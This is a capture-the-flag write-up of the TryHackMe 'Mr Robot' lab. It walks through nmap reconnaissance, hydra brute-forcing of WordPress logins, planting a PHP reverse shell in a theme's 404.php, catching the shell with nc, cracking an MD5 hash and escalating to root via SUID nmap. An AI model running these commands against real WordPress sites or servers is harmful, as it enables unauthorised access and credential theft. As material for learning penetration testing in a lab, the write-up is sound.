truelyyours

Mr Robot CTF - Writeup

4 min read

Init

Starting with nmap scan we have a HTTP server running.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-07 23:11 UTC
Nmap scan report for 10.201.32.43
Host is up (0.17s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 db:37:cf:3d:cd:a7:52:a5:36:23:3e:4b:74:62:79:32 (RSA)
|   256 76:4b:ff:81:1e:80:20:26:d0:98:fc:06:dd:9c:6d:39 (ECDSA)
|_  256 09:3c:3a:6b:90:25:e7:98:70:53:49:86:68:96:1b:df (ED25519)
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.49 seconds

The HTTP server loads to a fancy looking site with terminal type interface. This is a WordPress based site.

As this is a WordPress site, I can visit http://10.201.32.43/wp-login.php. The same is also found via gobuster dir traversal. There are a lot of common WordPress files found there.

One of the endpoint is /robots which tell us about fsociety.dic and key-1-of-3.txt. So, we have one key and then let’s explore the .dic file.

The .dic file has a lot of words it is just a dictionary after all. On the /wp-login endpoint. When I try with random username and password, the site shows “Invalid username”. So, probably I can use the dictionary to enumerate for a valid username using hydra.

So, we use the given form body and then use hydra to find valid usernames.

 hydra -L fsocity.dic -p password mrrobot.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.201.32.43%2Fwp-admin%2F&testcookie=1:Invalid username"

Then we can enumerate password as:

hydra -l Elliot -P fsocity.dic mrrobot.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.201.32.43%2Fwp-admin%2F&testcookie=1:The password you entered for the username" -t 30

NOTE: For some reason if we visit /license it is a very big page and when you scroll down you have the password as base64! ZWxsaW90OkVSMjgtMDY1Mgo=

User Flag

Here we have options to so some stuff to the website. Looking at the “Appearance”, I edit out the 404.php so that I can get a reverse shell. I use the code from https://www.revshells.com/ or you can use on from SecLists - SecLists/Web-Shells/PHP/Dysco.php

Then visiting the http://10.201.32.43/random and poof, I get a shell as user deamon.

┌─[thm_truelyyours]─[10.2.0.159]─[truelyyours@parrot]─[~/tryhackme/Mr Robot CTF]
└──╼ [★]$ rlwrap nc -lvnp 9001
Listening on 0.0.0.0 9001
Connection received on 10.201.32.43 57968
Linux ip-10-201-32-43 5.15.0-139-generic #149~20.04.1-Ubuntu SMP Wed Apr 16 08:29:56 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
 00:52:18 up  1:44,  0 users,  load average: 0.01, 0.43, 0.93
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
sh: 0: can't access tty; job control turned off
$
$
$ ls
bin
boot

Going to the /home we have use robot who have a password file and 2nd key. Just going to crakstation.net, we can crack the md5 password:

abcdefghijklmnopqrstuvwxyz

Privilege Escalation

So, now we are the user robot and have the 2nd key! To have a better shell, I SSH into using robot’s credentials. Loading linpeas.sh on the remote (at /tmp), among the SUID bit set, we have nmap whose SUID is set. Checking out gtfobins, we can use nmap --interactive to get a root shell!

robot@ip-10-201-32-43:/tmp$ nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
root@ip-10-201-32-43:/tmp# whoami
root

Now we can get the 3rd key at /root/key-3-of-3.txt!

Cheer, on doing a very non-intuitive machine! May have been frustrating! Try Hack me can invest a bit more on infra and make it as stable or close to HTB haha! 🎉🎉